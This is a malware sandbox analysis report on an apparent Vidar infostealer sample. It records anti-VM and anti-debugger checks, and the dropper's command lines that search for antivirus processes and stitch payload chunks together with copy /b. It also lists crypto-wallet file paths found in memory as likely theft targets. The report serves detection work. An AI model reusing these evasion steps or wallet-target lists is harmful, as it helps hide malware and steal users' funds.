WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406301 FindFirstFileW,FindClose,	5_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406CC7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0090E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_0091A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009166DC FindFirstFileW,FindNextFileW,FindClose,	18_2_009166DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DC622 FindFirstFileExW,	18_2_008DC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	18_2_009173D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00917333 FindFirstFileW,FindClose,	18_2_00917333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090D921

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

18_2_008A5FC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: powershell.exe, 00000000.00000002.1984512408.000001D06B48D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000000.00000002.1984512408.000001D06B44F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1984512408.000001D06B48D000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3022739178.0000028F6025A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3021193395.0000028F5AC2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: putt.exe, 00000005.00000002.1948704939.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091F4FF BlockInput,

18_2_0091F4FF

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_008A338B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008C5058 mov eax, dword ptr fs:[00000030h]

18_2_008C5058

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_009020AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

18_2_009020AA

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_008D2992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_008C0BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0D45 SetUnhandledExceptionFilter,	18_2_008C0D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_008C0F91

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_00901B4D

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_008A338B

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090BBED SendInput,keybd_event,

18_2_0090BBED

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090EC9E mouse_event,

18_2_0090EC9E

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_009014AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

18_2_009014AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00901FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_00901FB0

Source: Inf.com, 00000012.00000002.3020336128.0000000000963000.00000002.00000001.01000000.0000000D.sdmp, Name.14.dr, Inf.com.7.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Inf.com	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008C0A08 cpuid

18_2_008C0A08

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008FE5F4 GetLocalTime,

18_2_008FE5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008FE652 GetUserNameW,

18_2_008FE652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008DBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

18_2_008DBCD2

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

5_2_00406831

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Inf.com, 00000012.00000002.3020527913.0000000001400000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
